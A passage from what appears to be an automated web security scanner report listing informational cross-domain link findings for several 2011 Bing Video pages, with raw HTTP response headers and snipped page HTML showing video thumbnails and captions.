http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=72a24c8b-360e-43ce-928b-4620604bd7ce&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=af5fea2f-441d-4be7-9c9a-1984d9c5876e&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=0fe7c409-c17a-4f43-9ef0-89d37137c520&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=2e5ade00-4054-4e63-9684-930efc0653b9&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=582420e2-7c04-4ce9-a47d-9f3fa1830238&w=128&h=72&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=582420e2-7c04-4ce9-a47d-9f3fa1830238&w=640&h=360&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=99ce10ec-248b-f04b-b7bf-de9d4fd39641&w=128&h=72&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=99ce10ec-248b-f04b-b7bf-de9d4fd39641&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=ae0573be-5925-40a0-91ee-1d41b3192462&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 163915
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:17 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:17 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=1D8B0FDCCFE14AAF8C689C75E8B4E4C4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce76641ff25774cb1b1d83ab67d8126d3; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/browse" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="imageContainer">
<img class="image" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=582420e2-7c04-4ce9-a47d-9f3fa1830238&w=640&h=360&so=4" alt="" />
<img class="image" style="visibility:hidden;" alt="" />
...[SNIP]...
c04-4ce9-a47d-9f3fa1830238" data-instName="Thumb" style="text-decoration:none" href="http://www.bing.com/videos/watch/video/monster-storm-cripples-midwest/6dqn98r" class="motionThumb playerUrl"
>

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=582420e2-7c04-4ce9-a47d-9f3fa1830238&w=128&h=72&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
f-de9d4fd39641" data-instName="Thumb" style="text-decoration:none" href="http://www.bing.com/videos/watch/video/wednesday-feb-2-the-biggest-disappointment/501bwma" class="motionThumb playerUrl"
>

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=99ce10ec-248b-f04b-b7bf-de9d4fd39641&w=128&h=72&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
111b-f78d-40de-8ede-d7b3cefae831" data-instName="Thumb" style="text-decoration:none" href="http://www.bing.com/videos/watch/video/can-meds-guarantee-a-win/pqfvac7" class="motionThumb playerUrl"
>

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=15c0111b-f78d-40de-8ede-d7b3cefae831&w=128&h=72&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
99-9668-6268309cb93d" data-instName="Thumb" style="text-decoration:none" href="http://www.bing.com/videos/watch/video/one-man-driver-and-windshield-wiper/209cnp5p" class="motionThumb playerUrl"
>

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=88535561-4156-4b99-9668-6268309cb93d&w=128&h=72&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
none" href="http://www.bing.com/videos/watch/video/size-matters-at-starbucks/1d2vsou86" class="motionThumb playerUrl"
title="Starbucks has introduced a new drink size." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=0fe7c409-c17a-4f43-9ef0-89d37137c520&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ing.com/videos/watch/video/10-amazing-facts-about-the-human-body/uf9z15m3" class="motionThumb playerUrl"
title="Find out just how incredible the human body is." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=32ea9e4c-68c9-4ee9-b83c-ef072842cf73&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;coined by nurses to fully express what the men are who offer a safe ride from home to work and back again." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=c8279d4c-b6d4-4dfc-8666-23c8d5d710a3&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Khoury was savagely ambushed by a group of teenagers while walking home from school. NBC’s Peter Alexander reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=7940a3ff-57bb-4e65-985f-178b70beed0e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;The Weather Channel’s Jeff Morrow reports from Oklahoma City and TODAY’s Al Roker tracks the storm from Chicago." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=af5fea2f-441d-4be7-9c9a-1984d9c5876e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ayerUrl"
title="Jan. 31: As the Super Bowl nears, television sales skyrocket and prices dip. NBC's Mark Barger reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=d6925ee8-776e-4ba0-82f7-f6aefae8a95a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 OptionSellers.com and Matt DiFrisco of Oppenheimer tell CNBC how traders can cash in on this anticipated price increase." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=5b8ce2f5-6e16-4c2f-b7cf-fd6645600b73&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
.bing.com/videos/watch/video/money-saving-myths/2zfpj4bb" class="motionThumb playerUrl"
title="Keep these five myths from making a dent in your wallet." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=2e5ade00-4054-4e63-9684-930efc0653b9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
eb. 2: TODAY’s Kathie Lee Gifford and Hoda Kotb chat about Punxsutawney Phil’s prediction of an early spring." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=3c8b3fe1-bfee-4ab2-b6c6-389df23dbb3c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
king news about rioting between pro- and anti- Mubarak supporters in Cairo and discuss the near future of the region." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=d51749e5-4860-42bb-a26d-a8f5792093fe&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
h for America, a program that recruits college graduates to teach in some of the nation’s poorest school districts." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=ae0573be-5925-40a0-91ee-1d41b3192462&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ew Old Spice pitchman and now the 36-year-old has landed on TheGrio.com's list of 100 most influential African-Americans." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=1ff58486-3972-4cf0-9a92-5c9b89c1d582&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
s three key tips and recipes for cooking delicious pasta meals, including a veggie-loaded pasta puttanesca and then some." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=d3919fc1-f09a-4c9a-9f0a-d44494d942be&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
le="You don't need a radio when getting a ride from this cab driver in Brazil. He provides all the entertainment." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=c9575d7c-dc8e-417d-9505-aa0c48effc2b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ring to capture unidentified lights hovering over Jerusalem and the Dome of the Rock. TODAYshow.com's Dara Brown reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=5996a99f-59b4-434e-8c7e-413066209813&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
oxing-hip-hops-history/207ls0j6" class="motionThumb playerUrl"
title="French beatboxing phenom Eklips performs a tribute to the history of hip-hop." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=72a24c8b-360e-43ce-928b-4620604bd7ce&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
u52" class="motionThumb playerUrl"
title="You can teach a bird to sing, but you just can't teach the soul behind the voice." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=16b974a8-3d9a-4132-a8f7-9aa155cf4d1b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
n on a sports movie pep talk mashup, James Franco's new class, and a helpful site for bad gift-giving boyfriends." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=cd97a6ad-9c54-90d5-c380-7ec0ce063d0a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
mb playerUrl"
title="Pastry chef Rhonda Ruckman joins Donald Link to create a cobbler inspired by the Buffalo Trace Distillery." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ca4fa2f4-c25e-d7a7-2383-c0f1502d7e1b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 recap "The Biggest Loser Couples," "Teen Mom 2," "The Real Housewives of Beverly Hills" and "V."" >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=99ce10ec-248b-f04b-b7bf-de9d4fd39641&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
or Best Actor and Best Actress. Who do YOU think will win the Academy's top awards at this year's Oscars?" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=5f949448-6b16-f447-9ea0-29a68a76343d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;are the foundation of classic beauty. Even if you weren’t born with them, these tips can help you get them." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=8a0df08e-be39-c902-1539-90753b694598&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.233. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/earthquake-proof-bridge/pfu8x7j

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j?q=Bridge&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://dsc.discovery.com/tv/solving-history/solving-history.html
http://dsc.discovery.com/videos/solving-history-atlantis/index.html
http://dsc.discovery.com/videos/solving-history-devils-island/index.html
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=5205c9bd-62c4-4b87-8448-f1ce7bc48a2d&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.msn.com/Image.aspx?uuid=2ea3e646-66b8-479c-b634-7db22c31b834&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=34a9694a-1aca-4612-926b-f60cc8a93665&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=714d1cb1-2d32-42a7-916c-b2d322c89335&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=269a3537-88b3-4141-90b9-0ff9a2a38577&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=7ee7a96f-08a9-4324-b089-81ff9d67c411&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=d4643ddb-f135-48c3-8295-ea27d03284df&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=d4643ddb-f135-48c3-8295-ea27d03284df&w=400&h=300&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=0c36dab0-edab-401e-9600-c1fc9d5abb1d&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=269d4173-f486-44a9-b94b-2e53bc4b54b9&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=8cee8c53-30b0-480d-b6c7-afae931fe696&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fearthquake-proof-bridge%2fpfu8x7j%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 110287
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:20 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.688 secs
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:20 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42006; domain=.bing.com; path=/videos
Set-Cookie: ocid=42006; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=6E5A086A9AF74D6F91B72385C55EFF40; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c167cdd32c1d54aa292824403b8d50b5f; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:20 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j" /><link rel="image_src" href="http://img3.catalog.video.msn.com/Image.aspx?uuid=d4643ddb-f135-48c3-8295-ea27d03284df&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fearthquake-proof-bridge%2fpfu8x7j%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://dsc.discovery.com/tv/solving-history/solving-history.html" data-instName="InfoRelatedLinks">Watch more Solving History videos!</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://dsc.discovery.com/videos/solving-history-atlantis/index.html" data-instName="InfoRelatedLinks">Solving History: Atlantis</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://dsc.discovery.com/videos/solving-history-devils-island/index.html" data-instName="InfoRelatedLinks">Solving History: Devil's Island Prison</a>
...[SNIP]...
humb playerUrl"
title="A couple of daring bus drivers take on this flooded bridge in Nicaragua. Probably not the best idea." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=34a9694a-1aca-4612-926b-f60cc8a93665&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ridge in Greece isn't anchored to the seabed, so its towers can move independently in the event of an earthquake." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=d4643ddb-f135-48c3-8295-ea27d03284df&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Fleet Week, this United Airlines Boeing 747-400 thrilled the crowd with a low-level fly-by of the Golden Gate Bridge." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=8cee8c53-30b0-480d-b6c7-afae931fe696&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;bridge into town is destroyed and the beer truck can't get in. The solution? Build a human bridge of course." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=7ee7a96f-08a9-4324-b089-81ff9d67c411&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ge&rel=MSN" class="motionThumb playerUrl"
title="Swindon, UK. 1996. A double-decker bus meets a low bridge. Score: Bridge 1, Bus 0." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=714d1cb1-2d32-42a7-916c-b2d322c89335&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ad, the bridge gave way and collapsed into the rushing water of the river underneath. Rushing Water Sweeps Bridge Out" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=2ea3e646-66b8-479c-b634-7db22c31b834&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
otionThumb playerUrl"
title="After being open less than a year, this bridge's foundation loosened due to melting glacier water." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=0c36dab0-edab-401e-9600-c1fc9d5abb1d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
dge&rel=MSN" class="motionThumb playerUrl"
title="Bridge blasters Cody and Scott Gustafson carry out a perfect demolition in Foxburg, Penn." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=5205c9bd-62c4-4b87-8448-f1ce7bc48a2d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 is imploded this morning over the Mississippi River. The outdated bridge was replaced with a newer bridge last year." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=269a3537-88b3-4141-90b9-0ff9a2a38577&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;U.S. Army Corps of Engineers shows the I-35 highway bridge buckling and then collapsing. TODAY host Matt Lauer reports." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=269d4173-f486-44a9-b94b-2e53bc4b54b9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;cancellation of more than 6,000 flights and prompting power outages from Texas to Michigan. NBC's Kevin Tibbles reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
playerUrl"
title="Steelers' linebacker James Harrison jokes around about not hurting any Packers player during the Super Bowl." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.234. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj?q=are+we+there+yet&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.msn.com/Image.aspx?uuid=212c632c-9610-46f3-868a-d23fab5ac326&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=4b4406e5-344a-48c6-ba3d-41a62347ba79&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=ad528ffd-a5d6-4594-b12e-d87dd31f366d&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.msn.com/Image.aspx?uuid=51e16117-6dd6-477f-bf66-b175d1a90116&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=af37f3a7-01df-4cc3-a948-74ad2a655431&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=c01c69b3-35d3-4908-9de3-fa09edcaf3f9&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=8eb75cb2-ca4a-474d-83ee-1e93b23ade22&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=11329c94-ec82-4afe-b7c5-899e56c80e8b&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=3506b307-4997-4d04-b938-dd119573e1c9&w=160&h=90&so=4
